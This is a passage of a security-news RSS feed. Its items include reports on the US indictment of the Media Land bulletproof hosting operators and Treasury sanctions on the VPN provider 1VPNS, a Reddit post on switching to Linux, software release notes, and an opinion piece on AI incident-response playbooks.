<p data-start="1902" data-end="2111">According to court documents, Media Land, owned by Volosovik, and ML.Cloud, owned by Pankova, provided <a class="wpil_keyword_link" href="https://thecyberexpress.com/what-is-internet/" title="internet" data-wpil-keyword-link="linked" data-wpil-monitor-id="28970">internet</a> infrastructure and server hosting services designed to help cybercriminals evade law enforcement.</p>
<p data-start="2113" data-end="2296">Authorities allege the companies operated from St. Petersburg while maintaining infrastructure in multiple countries, including China, Finland, the Netherlands, and the United States.</p>
<p data-start="2298" data-end="2577">The businesses allegedly offered bulletproof hosting services that enabled criminal clients to deploy malware and ransomware, extort victims for money and <a href="https://thecyberexpress.com/cryptocurrency-mixing-service-bitcoin-seized/" target="_blank" rel="noopener">cryptocurrency</a>, register fraudulent domains, operate criminal marketplaces, and launch phishing and brute-force attacks.</p>
<p data-start="2579" data-end="2738">Investigators said the companies also provided technical support to cybercriminal customers, allowing malicious campaigns to continue while avoiding detection.</p>

<h3 data-section-id="108i6jp" data-start="2740" data-end="2792"><strong>Victims Spanned Critical Sectors Across 21 States</strong></h3>
<p data-start="2794" data-end="2908">Officials said the operation targeted dozens of organizations across 21 U.S. states as well as multiple countries.</p>
<p data-start="2910" data-end="2927">Victims included:</p>

<ul data-start="2929" data-end="2998">
 	<li data-section-id="16y39h9" data-start="2929" data-end="2936">Banks</li>
 	<li data-section-id="1tvaq5r" data-start="2937" data-end="2946">Schools</li>
 	<li data-section-id="1khey9s" data-start="2947" data-end="2968">Government entities</li>
 	<li data-section-id="1k0ubkf" data-start="2969" data-end="2980">Hospitals</li>
 	<li data-section-id="1q2cyct" data-start="2981" data-end="2998">Media companies</li>
</ul>
<p data-start="3000" data-end="3124">Communities affected in Ohio included Akron, Brookfield, Canton, Cleveland, Elyria, Medina, Findlay, Solon, and Valley View.</p>
<p data-start="3000" data-end="3124"><img class="aligncenter wp-image-113103 size-full" src="https://thecyberexpress.com/wp-content/uploads/3-Russian-cybercrime-indictment-e1784090783177.webp" alt="Russian cybercrime indictment" width="600" height="400"></p>
<p data-start="3126" data-end="3384">Additional affected states included California, Florida, Georgia, Illinois, Louisiana, Maryland, Massachusetts, Michigan, Minnesota, New Hampshire, New York, North Carolina, Pennsylvania, Tennessee, Texas, Utah, Virginia, Washington, Wisconsin, and Delaware.</p>
<p data-start="3386" data-end="3515">International victims were identified in Australia, Canada, the European Union, the United Arab Emirates, and the United Kingdom.</p>
<p data-start="3517" data-end="3715"><a href="https://thecyberexpress.com/e-note-crypto-exchange-seized/" target="_blank" rel="noopener">FBI Cyber Division</a> Assistant Director Brett Leatherman said Media Land enabled malicious activity that caused tens of millions of dollars in losses while impacting victims across multiple countries.</p>

<h3 data-section-id="10nhdi" data-start="3717" data-end="3750"><strong>Russian Cybercrime Indictment Prompts $10 Million Reward Offer</strong></h3>
<p data-start="3752" data-end="4051">The U.S. Department of State's Rewards for Justice program announced a reward of up to $10 million for actionable information regarding foreign government-linked associates of the indicted individuals, their malicious <a class="wpil_keyword_link" href="https://thecyberexpress.com/cyber-news/" title="cyber" data-wpil-keyword-link="linked" data-wpil-monitor-id="28968">cyber</a> activities, or foreign government-linked use of Media Land or ML.Cloud.</p>
<p data-start="4053" data-end="4147">The program also noted that relocation assistance may be available for qualifying information.</p>

<h3 data-section-id="atkbpo" data-start="4149" data-end="4191"><strong>International Sanctions Expand Pressure</strong></h3>
<p data-start="4193" data-end="4279">The indictment follows coordinated international action against the alleged operators. In November 2025, the U.S. Department of the Treasury's Office of Foreign Assets Control, together with authorities from the United Kingdom and Australia, sanctioned Media Land for facilitating global <a class="wpil_keyword_link" href="https://cyble.com/knowledge-hub/what-is-ransomware/" target="_blank" rel="noopener" title="ransomware" data-wpil-keyword-link="linked" data-wpil-monitor-id="28963">ransomware</a> operations, distributed denial-of-service attacks, and other malicious cyber activities.</p>
<p data-start="4583" data-end="4785">The sanctions also targeted Volosovik, Zatolokin, and Pankova individually, along with Media Land subsidiaries Media Land Technology (MLT), <a class="wpil_keyword_link" href="https://thecyberexpress.com/what-is-data/" title="Data" data-wpil-keyword-link="linked" data-wpil-monitor-id="28965">Data</a> Center Kirishi (DC Kirishi), and sister company ML Cloud.</p>
<p data-start="4787" data-end="4949">On July 13, the <a href="https://thecyberexpress.com/chat-control-1-0-returns-after-euro-parliament/" target="_blank" rel="noopener">European Union</a> also announced sanctions against the companies and key individuals as part of broader efforts to disrupt cybercrime infrastructure.</p>

<h3 data-section-id="1avn398" data-start="4951" data-end="4999"><strong>International Agencies Back the Investigation</strong></h3>
<p data-start="5001" data-end="5176">The investigation was led by the FBI Cleveland Division with support from the <a class="wpil_keyword_link" href="https://cyble.com/knowledge-hub/what-is-cybersecurity/" target="_blank" rel="noopener" title="Cybersecurity" data-wpil-keyword-link="linked" data-wpil-monitor-id="28966">Cybersecurity</a> and Infrastructure Security Agency (CISA) and the Office of Foreign Assets Control.</p>
<p data-start="5178" data-end="5509">Authorities also received assistance from the National Police of the Netherlands, the Public Prosecutor's Office of the Netherlands, the United Kingdom's National <a class="wpil_keyword_link" href="https://thecyberexpress.com/" title="Crime" data-wpil-keyword-link="linked" data-wpil-monitor-id="28969">Crime</a> Agency, the United Kingdom Foreign Commonwealth and Development Office, the Australian Department of Foreign Affairs and Trade, and the Australian Federal Police.</p>
<p data-start="5511" data-end="5814" data-is-last-node="" data-is-only-node="">Officials from <a href="https://thecyberexpress.com/cisa-cve-2026-48939-cve-2026-56291/" target="_blank" rel="noopener">CISA</a> and partner agencies said disrupting bulletproof hosting providers remains essential because these services form a critical part of the cybercriminal ecosystem by enabling ransomware, phishing, malware, and other malicious operations while helping threat actors remain anonymous.</p>]]></content:encoded>
</item>
<item>
<title><![CDATA[Switching help]]></title>
<description><![CDATA[I'm looking at ditching Windows 10 and moving to Linux. I'm honestly just over Windows at this point. Even something as simple as wanting more than 5 rotating wallpapers is limited, and I can't move to Windows 11 because my main rig has dual CPUs. I'm after some opinions from people who daily dri...]]></description>
<link>https://tsecurity.de/de/3669396/linux-tipps/switching-help/</link>
<guid isPermaLink="true">https://tsecurity.de/de/3669396/linux-tipps/switching-help/</guid>
<pubDate>Wed, 15 Jul 2026 04:08:38 +0200</pubDate>
<category>🐧 Linux Tipps</category>
<source url="https://tsecurity.de">tsecurity.de</source>
<content:encoded><![CDATA[<!-- SC_OFF --><div class="md"><p>I'm looking at ditching Windows 10 and moving to Linux. I'm honestly just over Windows at this point. Even something as simple as wanting more than 5 rotating wallpapers is limited, and I can't move to Windows 11 because my main rig has dual CPUs.</p> <p>I'm after some opinions from people who daily drive Linux.</p> <p>At the moment I'm leaning towards openSUSE Tumbleweed. I'm generally not a fan of forks of other distros (Manjaro, CachyOS, etc.). My servers all run Debian, so I'm very familiar with Debian-based systems, but those are all headless so desktop experience isn't really a factor.</p> <p>I don't think Debian is the right choice for my desktop. I like it for servers because it's rock solid, but for gaming and newer hardware I feel it's a bit too conservative. That's one of the reasons I'm leaning towards Tumbleweed — it seems like a good middle ground with up-to-date packages while still having a reputation as a safer bleeding-edge rolling release.</p> <p>I had a pretty bad experience with Fedora. My GTX 1070 had horrible mouse lag with the proprietary drivers, and my 3Dconnexion SpaceMouse wasn't supported properly, so that put me off Fedora.</p> <p>From what I've researched, it seems like my best options are either Arch or openSUSE Tumbleweed, but I'm not 100% sure where to go.</p> <p>Gaming isn't a huge concern. The games I play are supported through Proton, and I don't have TPM (hardware swap reasons), so kernel-level anti-cheat isn't really an issue. I haven't been gaming much recently anyway — I've gotten into Wolfenstein: The New Order and I'm having fun with that on my second playthrough.</p> <p>Specs</p> <p>- Dual Xeon E5-2689 v1</p> <p>- 128GB DDR3 ECC RAM</p> <p>- GTX 1070</p> <p>- Radeon HD 6540</p> <p>- 5×500GB HDD</p> <p>- 1×250GB HDD</p> <p>- 1×6TB HDD</p> <p>Apps I know will be fine or have alternatives</p> <p>- OrcaSlicer</p> <p>- FreeCAD</p> <p>- 3Dconnexion SpaceMouse drivers</p> <p>- Spotify</p> <p>- qBittorrent</p> <p>- KDiskMark / smartctl instead of CrystalDiskInfo</p> <p>- lm-sensors / alternatives instead of Core Temp</p> <p>- Remmina instead of MobaXterm</p> <p>- Kdenlive</p> <p>- Audacity</p> <p>- Steam</p> <p>- Minecraft</p> <p>- Hardware monitoring tools</p> <p>- Discord</p> <p>Apps I'm unsure about</p> <p>- Logitech Options+</p> <p>- SuperDisplay / Android tablet as a wireless display</p> <p>- FrostWire</p> <p>- UniFi Network Server</p> <p>- WinDirStat equivalent</p> <p>- OBS Studio</p> <p>- Camo</p> <p>- Rockstar Games Launcher</p> <p>- Epic Games Launcher</p> <p>- DS4Windows / PS5 DualSense controller support</p> <p>- FancyZones alternative (KWin tiling, Hyprland, etc.)</p> <p>- Audio drivers/software</p> <p>I'm fairly comfortable in the terminal, so that isn't an issue. I don't mind learning, but I also don't want to spend every weekend fixing my OS.</p> <p>I'm open to suggestions. If you've used openSUSE Tumbleweed, Arch, or another distro that you think would suit my use case better, I'd like to hear your thoughts. Also interested in any issues I might run into with the apps listed above or anything else I should know before making the switch.</p> </div><!-- SC_ON -->   submitted by   <a href="https://www.reddit.com/user/Equal_General1672"> /u/Equal_General1672 </a> <br> <span><a href="https://i.redd.it/9hmdtnl8jadh1.jpeg">[link]</a></span>   <span><a href="https://www.reddit.com/r/linux/comments/1uwqszu/switching_help/">[comments]</a></span>]]></content:encoded>
</item>
<item>
<title><![CDATA[Why I'm using wired Android Auto when all the cool kids are switching to wireless]]></title>
<description><![CDATA[Sometimes, you have to dial back the tech to make ends meet.]]></description>
<link>https://tsecurity.de/de/3669352/hacking/why-im-using-wired-android-auto-when-all-the-cool-kids-are-switching-to-wireless/</link>
<guid isPermaLink="true">https://tsecurity.de/de/3669352/hacking/why-im-using-wired-android-auto-when-all-the-cool-kids-are-switching-to-wireless/</guid>
<pubDate>Wed, 15 Jul 2026 03:05:03 +0200</pubDate>
<category>🕵️ Hacking</category>
<source url="https://tsecurity.de">tsecurity.de</source>
<content:encoded><![CDATA[Sometimes, you have to dial back the tech to make ends meet.]]></content:encoded>
</item>
<item>
<title><![CDATA[Teleoperated Humanoid Robots Reach Live Surgery Milestone]]></title>
<description><![CDATA[UC San Diego's Surgie humanoid robots performed two live gallbladder surgeries on pigs, showing how adaptable robots could safely work in future hospitals.
The post Teleoperated Humanoid Robots Reach Live Surgery Milestone appeared first on TechRepublic.]]></description>
<link>https://tsecurity.de/de/3669031/it-nachrichten/teleoperated-humanoid-robots-reach-live-surgery-milestone/</link>
<guid isPermaLink="true">https://tsecurity.de/de/3669031/it-nachrichten/teleoperated-humanoid-robots-reach-live-surgery-milestone/</guid>
<pubDate>Tue, 14 Jul 2026 22:01:31 +0200</pubDate>
<category>📰 IT Nachrichten</category>
<source url="https://tsecurity.de">tsecurity.de</source>
<content:encoded><![CDATA[<p>UC San Diego's Surgie humanoid robots performed two live gallbladder surgeries on pigs, showing how adaptable robots could safely work in future hospitals.</p>
<p>The post <a href="https://www.techrepublic.com/article/news-surgie-humanoid-live-pig-surgery/">Teleoperated Humanoid Robots Reach Live Surgery Milestone</a> appeared first on <a href="https://www.techrepublic.com/">TechRepublic</a>.</p>]]></content:encoded>
</item>
<item>
<title><![CDATA[UniGetUI v2026.2.3]]></title>
<description><![CDATA[Devolutions UniGetUI 2026.2.3
This release focuses on performance, efficiency, and responsiveness across the entire application. UniGetUI now ships with NativeAOT enabled by default for all release packages, resulting in faster startup times and a leaner runtime. This update also delivers signifi...]]></description>
<link>https://tsecurity.de/de/3668477/downloads/unigetui-v202623/</link>
<guid isPermaLink="true">https://tsecurity.de/de/3668477/downloads/unigetui-v202623/</guid>
<pubDate>Tue, 14 Jul 2026 17:32:37 +0200</pubDate>
<category>💾 Downloads</category>
<source url="https://tsecurity.de">tsecurity.de</source>
<content:encoded><![CDATA[<h1>Devolutions UniGetUI 2026.2.3</h1>
<p>This release focuses on performance, efficiency, and responsiveness across the entire application. UniGetUI now ships with <strong>NativeAOT enabled by default</strong> for all release packages, resulting in faster startup times and a leaner runtime. This update also delivers significant optimizations to GPU usage, memory consumption, package icon handling, and scrolling performance, making the application smoother and more responsive</p>
<h3>Highlights</h3>
<ul>
<li><strong>NativeAOT is now the default</strong> for all UniGetUI release packages, improving startup performance and reducing runtime overhead.</li>
<li>Significantly reduced GPU usage by eliminating unnecessary indeterminate progress bar animations.</li>
<li>Optimized package icon loading and memory management for improved responsiveness and lower memory usage.</li>
<li>Improved package list and DataGrid scrolling performance for a smoother browsing experience.</li>
<li>Restored the dockable navigation pane with adaptive, docked, and overlay display modes.</li>
<li>Added toast notifications and enhanced operations feedback.</li>
<li>Added a manual <strong>Install</strong>, <strong>Update</strong>, and <strong>Uninstall</strong> mode for greater control over package operations.</li>
</ul>
<h3>Improvements</h3>
<ul>
<li>Package list sort order is now remembered independently for each page.</li>
<li>Improved operation logs by preserving your scroll position while new output is generated.</li>
<li>Updated the empty and loading state illustrations.</li>
<li>Improved title bar search layout and styling.</li>
<li>Fixed sidebar and filter pane icon inconsistencies.</li>
</ul>
<h3>Bug Fixes</h3>
<ul>
<li>Fixed the main window gradually increasing in size after restarting on Windows.</li>
<li>Fixed title bar search clipping when the window is maximized.</li>
<li>Fixed dark theme flyout readability on the release notes page.</li>
<li>Fixed log text colors when switching themes.</li>
<li>Fixed several installer script issues.</li>
</ul>
<p>Thank you to everyone who reported issues, submitted feedback, and contributed improvements to the project.</p>
<p><strong>Full Changelog:</strong> <a class="commit-link" href="https://github.com/Devolutions/UniGetUI/compare/v2026.2.2...v2026.2.3"><tt>v2026.2.2...v2026.2.3</tt></a></p>]]></content:encoded>
</item>
<item>
<title><![CDATA[WhatsApp Beta Tests Custom Cloud Backup to Free Up iCloud Space]]></title>
<description><![CDATA[The popular messaging platform WhatsApp is working on a first-party backup solution for iPhone users. This upcoming change means you will eventually have a choice in how you store your chat history. Instead of relying entirely on Apple for storage, you can keep your message logs and media files d...]]></description>
<link>https://tsecurity.de/de/3667917/ios-mac-os/whatsapp-beta-tests-custom-cloud-backup-to-free-up-icloud-space/</link>
<guid isPermaLink="true">https://tsecurity.de/de/3667917/ios-mac-os/whatsapp-beta-tests-custom-cloud-backup-to-free-up-icloud-space/</guid>
<pubDate>Tue, 14 Jul 2026 14:26:49 +0200</pubDate>
<category>🍏 iOS / Mac OS</category>
<source url="https://tsecurity.de">tsecurity.de</source>
<content:encoded><![CDATA[The popular messaging platform WhatsApp is working on a first-party backup solution for iPhone users. This upcoming change means you will eventually have a choice in how you store your chat history. Instead of relying entirely on Apple for storage, you can keep your message logs and media files directly on the chat app's own servers. This shift follows similar tests for Android users earlier this year.



Expect two gigabytes of free storage and default chat encryption



The latest beta version reveals that the company plans to offer 2GB of free space right out of the gate. If your chat history is larger than that, it is working on paid tiers. You might see a 50GB plan for about a dollar a month, which matches what Apple charges for its entry-level upgrade. A massive 1TB option is also in development for heavy users.



Security is a major focus here. Backups stored on the new servers will feature end-to-end encryption by default. This is a step up from the current system, where you have to manually turn on advanced data protection to encrypt your files.



The app recommends using a passkey for this, but a standard password or a 64-digit key will work just fine. Neither the messaging company nor its parent company can read your saved chats.



Switching saves your primary storage for photos and daily apps



Right now, chat backups eat into your limited free space on iCloud. Media-heavy chats take up a lot of room quickly. By moving these backups to a dedicated server, you instantly reclaim space for your photos, documents, and other daily essentials.







You do not have to make the switch if you prefer the old method. The current system remains the default choice. If you decide to change over, you can delete your old backup from your phone settings to free up gigabytes of space immediately. Along with other recent interface tweaks like the green dot showing when contacts are online, this feature reveals the company is steadily expanding how you manage your data and presence.



This backup alternative is still in beta testing and not yet ready for public release. The developer has not provided a specific launch date. However, giving users direct control over where their data lives is a practical move that solves a real storage problem. We will keep an eye out for when this rolls out to all users in a future app update.]]></content:encoded>
</item>
<item>
<title><![CDATA[Five reasons switching from IP VPN to SD WAN will help you build an AI-ready network]]></title>
<description><![CDATA[The scale, speed and complexity of modern cloud and AI workloads demand SD WAN.]]></description>
<link>https://tsecurity.de/de/3667631/it-nachrichten/five-reasons-switching-from-ip-vpn-to-sd-wan-will-help-you-build-an-ai-ready-network/</link>
<guid isPermaLink="true">https://tsecurity.de/de/3667631/it-nachrichten/five-reasons-switching-from-ip-vpn-to-sd-wan-will-help-you-build-an-ai-ready-network/</guid>
<pubDate>Tue, 14 Jul 2026 12:32:26 +0200</pubDate>
<category>📰 IT Nachrichten</category>
<source url="https://tsecurity.de">tsecurity.de</source>
<content:encoded><![CDATA[The scale, speed and complexity of modern cloud and AI workloads demand SD WAN.]]></content:encoded>
</item>
<item>
<title><![CDATA[No, NordVPN does not drain your phone battery]]></title>
<description><![CDATA[Always switching your VPN off to save your charge? New independent testing from West Coast Labs shows that notorious smartphone battery drain is mostly a myth, with NordVPN consuming under 2% of your daily battery life.]]></description>
<link>https://tsecurity.de/de/3667516/it-nachrichten/no-nordvpn-does-not-drain-your-phone-battery/</link>
<guid isPermaLink="true">https://tsecurity.de/de/3667516/it-nachrichten/no-nordvpn-does-not-drain-your-phone-battery/</guid>
<pubDate>Tue, 14 Jul 2026 12:02:44 +0200</pubDate>
<category>📰 IT Nachrichten</category>
<source url="https://tsecurity.de">tsecurity.de</source>
<content:encoded><![CDATA[Always switching your VPN off to save your charge? New independent testing from West Coast Labs shows that notorious smartphone battery drain is mostly a myth, with NordVPN consuming under 2% of your daily battery life.]]></content:encoded>
</item>
<item>
<title><![CDATA[AI incidents need a new playbook. Here’s how to build one]]></title>
<description><![CDATA[Seventy-one percent of organizations say AI has access to core business systems. Only 16% govern that access effectively, according to the 2026 CISO AI Risk Report. Ask your IR team three questions: Where is your AI system inventory? What happens if a production model starts generating harmful ou...]]></description>
<link>https://tsecurity.de/de/3667390/it-security-nachrichten/ai-incidents-need-a-new-playbook-heres-how-to-build-one/</link>
<guid isPermaLink="true">https://tsecurity.de/de/3667390/it-security-nachrichten/ai-incidents-need-a-new-playbook-heres-how-to-build-one/</guid>
<pubDate>Tue, 14 Jul 2026 11:08:53 +0200</pubDate>
<category>📰 IT Security Nachrichten</category>
<source url="https://tsecurity.de">tsecurity.de</source>
<content:encoded><![CDATA[<div>
		<div class="grid grid--cols-10@md grid--cols-8@lg article-column">
					  <div class="col-12 col-10@md col-6@lg col-start-3@lg">
						<div class="article-column__content">
<section class="wp-block-bigbite-multi-title"><div class="container"></div></section>



<p class="wp-block-paragraph">Seventy-one percent of organizations say AI has access to core business systems. Only 16% govern that access effectively, <a href="https://www.cybersecurity-insiders.com/2026-ciso-ai-risk-report/">according to the 2026 CISO AI Risk Report</a>. Ask your IR team three questions: Where is your AI system inventory? What happens if a production model starts generating harmful outputs? Who has the authority to take it offline?</p>



<p class="wp-block-paragraph">I’ve spent 14 years in security — energy, banking, telecom, manufacturing. Red team work, detection programs and the last several years focused on AI risk and ShadowAI. What I see consistently: Organizations have AI in production, they have an IR playbook and they think those two things are connected. They’re not.</p>



<p class="wp-block-paragraph">The CISO who thinks their IR playbook covers AI incidents probably hasn’t tested it. The ones who have tested it know it doesn’t.</p>



<h2 class="wp-block-heading">Two kinds of AI incident — and why that split matters more than the list</h2>



<p class="wp-block-paragraph">AI incidents <a href="https://www.glacis.io/guide-ai-incident-response">surged 56.4% from 2023 to 2024, reaching 233 documented cases</a>. Most IR frameworks — including NIST SP 800-61, MITRE ATLAS and the GLACIS AI Incident Response Playbook — provide you with a taxonomy of six incident types and stop there. While useful, it misses the more important split: Failures the model causes on its own, versus failures caused by a human. Your detection approach, your containment logic and your legal exposure are very different between those two groups.</p>



<p class="wp-block-paragraph">Model-originated failures — degradation, bias, hallucinations — happen when the system does exactly what it was built to do, just badly. The Epic Sepsis Model, deployed across hundreds of US hospitals, had a sensitivity of only 33% at external validation. It missed two-thirds of actual sepsis cases and flooded physicians with false alerts, <a href="https://doi.org/10.1001/jamainternmed.2021.2626">as a 2021 JAMA Internal Medicine study found</a>. No one attacked it. It just quietly stopped working while every dashboard stayed green.</p>



<p class="wp-block-paragraph">Externally induced failures — adversarial attacks, data poisoning, privacy breaches — happen when someone corrupts the inputs or the training environment. Tesla’s Autopilot phantom braking cases, <a href="https://www.glacis.io/guide-ai-incident-response">investigated by NHTSA across hundreds of thousands of vehicles</a>, show what adversarial input failures look like in a safety-critical system. These two groups need different primary defenses and their own playbooks.</p>



<p class="wp-block-paragraph">Then there is the hybrid case, which carries the most legal exposure right now. Hallucinations are model-originated but they land in court like human errors. When Air Canada’s chatbot invented a bereavement fare policy, <a href="https://decisions.civilresolutionbc.ca/crt/crtd/en/item/519/index.do">the airline was held liable</a>. When a US federal court let <a href="https://law.justia.com/cases/federal/district-courts/california/candce/3:2023cv01924/414830/96/">Mobley v. Workday</a> proceed, it accepted that an AI hiring platform could be directly liable as an ‘agent’ of the employers using it. Neither failure looked like a security incident. Both ended up as legal ones. If your legal team is not on your IR call tree, your playbook is already incomplete.</p>



<h2 class="wp-block-heading">The CIA triad doesn’t cover a hallucination</h2>



<p class="wp-block-paragraph">The CIA triad — confidentiality, integrity, availability — does not apply to most AI incidents. When Air Canada’s chatbot made up a policy, nothing was unavailable, nothing was changed without authorization, nothing was disclosed. The framework simply doesn’t reach it. When the Epic Sepsis Model missed two-thirds of cases, there was no breach, no intrusion, no indicator of compromise. By every traditional IR metric, the system looked fine.</p>



<p class="wp-block-paragraph">This is not an edge case. Classical IR frameworks assume deterministic failures with static indicators of compromise — an assumption <a href="https://doi.org/10.3390/jcp6010020">that breaks down against probabilistic systems</a>. Microsoft’s Security Blog said it well in April 2026: A model may produce harmful output today and something completely different from the same prompt tomorrow. The root cause is not a line of code. It is a probability distribution, and <a href="https://www.microsoft.com/en-us/security/blog/2026/04/15/incident-response-for-ai-same-fire-different-fuel/">as Microsoft’s Security Blog put it</a>, you cannot patch a probability distribution.</p>



<p class="wp-block-paragraph">The numbers confirm the gap. Average AI incident detection time is 4.5 days. <a href="https://www.glacis.io/guide-ai-incident-response">Sixty-seven percent of AI incidents come from model errors, not adversarial attacks</a> — yet security budgets keep funding perimeter tools built for the latter. We are looking for the wrong signals, with the wrong tools, for the wrong failure modes.</p>



<h2 class="wp-block-heading">What a mature AI IR capability looks like</h2>



<p class="wp-block-paragraph">I get asked this at every conference I speak at. Here is the short answer: Three things that mature teams have in place before any incident occurs.</p>



<p class="wp-block-paragraph">First, an AI Bill of Materials (AIBOM) for every production system. Think of it like a software SBOM, but for AI: It documents the base model, training datasets, third-party dependencies and the full component stack. Without it, you don’t know what your AI is made of — and you can’t investigate a data poisoning incident or a supply chain compromise without that baseline. The OWASP GenAI Security Project released an <a href="https://genai.owasp.org/resource/owasp-aibom-generator/">open-source AIBOM generator</a> in December 2025 that produces output in CycloneDX format aligned with SPDX standards. It is practical to implement now.</p>



<p class="wp-block-paragraph">Second, a model card for every production AI system — not a document in a shared drive nobody opens, but something your IR team can pull up in the first ten minutes of a response. Training data provenance. Model version. Known performance limits, including which subpopulations showed weaker accuracy in testing. Access controls. Blast radius if it fails. Most organizations I work with have model documentation written for data scientists that no one in security can use at 2am. That is not documentation. That is liability.</p>



<p class="wp-block-paragraph">Third, a named data scientist on the IR call tree. Not someone to brief after the incident — someone with authority to interrogate model behavior in real time. Traditional IR has a network engineer on call. AI IR needs the same logic applied to the people who understand how the failing system works.</p>



<p class="wp-block-paragraph">A fourth thing that very few teams have: A documented rollback threshold for each deployed model. A pre-agreed definition of what anomaly rate, drift metric or fairness deviation triggers containment or a fallback switch. Teams without this spend the first hours of an AI incident debating whether what they are seeing is actually a problem. Teams with a threshold spend those hours responding.</p>



<h2 class="wp-block-heading">Four things to do before the next incident</h2>



<p class="wp-block-paragraph">Rewrite your detection triggers. Output anomaly scoring, data distribution monitoring for drift and behavioral tracking of model API usage need to be in your detection layer. They will not come from your SIEM. This is instrumentation work at the AI system level.</p>



<p class="wp-block-paragraph">Redefine containment. For most AI incidents, ‘isolate the system’ is the wrong first move. Switching to a rule-based fallback while keeping the service running may cause less harm than taking the system offline and triggering a business escalation. Each deployed model needs pre-defined rollback criteria and a named fallback. Write those down now.</p>



<p class="wp-block-paragraph">Get legal in the room before the incident. <a href="https://law.justia.com/cases/federal/district-courts/california/candce/3:2023cv01924/414830/96/">Mobley v. Workday</a> means both the AI vendor and the deploying organization can carry liability for bias incidents. <a href="https://decisions.civilresolutionbc.ca/crt/crtd/en/item/519/index.do">Air Canada</a> means you cannot disclaim what your AI says to a customer. If your legal team is learning about an AI incident from a press inquiry, something has already gone wrong.</p>



<p class="wp-block-paragraph">Build your AI inventory and treat it like your asset register. Start with the AIBOM for your highest-risk systems — those with access to customer data, financial decisions or clinical workflows. The <a href="https://doi.org/10.3390/jcp6010020">GenAI-IRF framework</a> gives you a structured taxonomy for this work and the <a href="https://www.glacis.io/guide-ai-incident-response">GLACIS AI Incident Response Playbook</a> maps it to NIST SP 800-61 and MITRE ATLAS procedures your team can adapt without starting from scratch.</p>



<p class="wp-block-paragraph"><a href="https://www.proofpoint.com/us/resources/threat-reports/ai-human-risk-landscape-report">Forty-two percent of organizations have already had a suspicious or confirmed AI incident</a>, and more than half say their security posture is catching up, inconsistent or reactive. Updating your playbook isn’t optional. Fix it before you need it.</p>



<p class="wp-block-paragraph"><strong>This article is published as part of the Foundry Expert Contributor Network.</strong><br><a href="https://www.cio.com/expert-contributor-network/"><strong>Want to join?</strong></a></p>
</div></div></div></div>]]></content:encoded>
</item>
<item>
<title><![CDATA[US Treasury Sanctions VPN Provider Linked to Ransomware]]></title>
<description><![CDATA[The U.S. Treasury Department has announced new ransomware sanctions against a virtual private network (VPN) provider, its administrator, and a malware service provider accused of enabling ransomware attacks targeting Americans. The Office of Foreign Assets Control (OFAC) said the designated indiv...]]></description>
<link>https://tsecurity.de/de/3667135/it-security-nachrichten/us-treasury-sanctions-vpn-provider-linked-to-ransomware/</link>
<guid isPermaLink="true">https://tsecurity.de/de/3667135/it-security-nachrichten/us-treasury-sanctions-vpn-provider-linked-to-ransomware/</guid>
<pubDate>Tue, 14 Jul 2026 09:22:15 +0200</pubDate>
<category>📰 IT Security Nachrichten</category>
<source url="https://tsecurity.de">tsecurity.de</source>
<content:encoded><![CDATA[<p><img width="1536" height="1024" src="https://thecyberexpress.com/wp-content/uploads/Ransomware-sanctions.webp" class="attachment-post-thumbnail size-post-thumbnail wp-post-image" alt="Ransomware sanctions" decoding="async" srcset="https://thecyberexpress.com/wp-content/uploads/Ransomware-sanctions.webp 1536w, https://thecyberexpress.com/wp-content/uploads/Ransomware-sanctions-300x200.webp 300w, https://thecyberexpress.com/wp-content/uploads/Ransomware-sanctions-1024x683.webp 1024w, https://thecyberexpress.com/wp-content/uploads/Ransomware-sanctions-768x512.webp 768w, https://thecyberexpress.com/wp-content/uploads/Ransomware-sanctions-600x400.webp 600w, https://thecyberexpress.com/wp-content/uploads/Ransomware-sanctions-150x100.webp 150w, https://thecyberexpress.com/wp-content/uploads/Ransomware-sanctions-750x500.webp 750w, https://thecyberexpress.com/wp-content/uploads/Ransomware-sanctions-1140x760.webp 1140w, https://thecyberexpress.com/wp-content/uploads/Ransomware-sanctions.webp 1536w, https://thecyberexpress.com/wp-content/uploads/Ransomware-sanctions-300x200.webp 300w, https://thecyberexpress.com/wp-content/uploads/Ransomware-sanctions-1024x683.webp 1024w, https://thecyberexpress.com/wp-content/uploads/Ransomware-sanctions-768x512.webp 768w, https://thecyberexpress.com/wp-content/uploads/Ransomware-sanctions-600x400.webp 600w, https://thecyberexpress.com/wp-content/uploads/Ransomware-sanctions-150x100.webp 150w, https://thecyberexpress.com/wp-content/uploads/Ransomware-sanctions-750x500.webp 750w, https://thecyberexpress.com/wp-content/uploads/Ransomware-sanctions-1140x760.webp 1140w" sizes="(max-width: 1536px) 100vw, 1536px" title="US Treasury Sanctions VPN Provider Linked to Ransomware 1"></p><p data-start="392" data-end="887">The <a href="https://thecyberexpress.com/digital-asset-cybersecurity-initiative/" target="_blank" rel="noopener">U.S. Treasury Department</a> has announced new ransomware sanctions against a virtual private network (VPN) provider, its administrator, and a malware service provider accused of enabling ransomware attacks targeting Americans. The <a href="https://thecyberexpress.com/the-us-treasury-sanctions-burma/" target="_blank" rel="noopener">Office of Foreign Assets Control</a> (OFAC) said the designated individuals and entity allegedly supplied infrastructure and tools used by cybercriminals to carry out attacks against U.S. businesses, hospitals, financial institutions, and critical infrastructure.</p>
<p data-start="889" data-end="1175">The action, coordinated with the United Kingdom, is part of broader efforts to disrupt the cybercrime ecosystem supporting ransomware operations. The Treasury said the targeted services have contributed to attacks that resulted in billions of dollars in losses across the United States.</p>

<h3 data-section-id="1m5dck8" data-start="1177" data-end="1224"><strong><span role="text">OFAC Targets 1VPNS and Its Administrator</span></strong></h3>
<p data-start="1226" data-end="1566">At the center of the <a class="wpil_keyword_link" href="https://thecyberexpress.com/what-is-ransomware-how-it-work/" title="ransomware" data-wpil-keyword-link="linked" data-wpil-monitor-id="28959">ransomware</a> sanctions is 1VPNS, a VPN provider that OFAC described as a key infrastructure supplier for ransomware operators and other cybercriminals. The Treasury also designated Dmytro Rashevskyi, the administrator of 1VPNS, for allegedly providing technological support to cyber-enabled criminal activity.</p>
<p data-start="1568" data-end="1744">According to OFAC, <a href="https://thecyberexpress.com/stolen-vpn-credentials-most-common-ransomware-attack-vector/" target="_blank" rel="noopener">VPN</a> services have legitimate privacy and security uses but can also be misused to conceal the origin of cyberattacks, deploy malware, and manage stolen data.</p>
<p data-start="1746" data-end="1958">The Treasury <a href="https://home.treasury.gov/news/press-releases/sb0559" target="_blank" rel="nofollow noopener">said</a> ransomware groups used 1VPNS infrastructure during attacks against U.S. companies and institutions, including financial services firms, hospitals, municipal governments, and other organizations.</p>
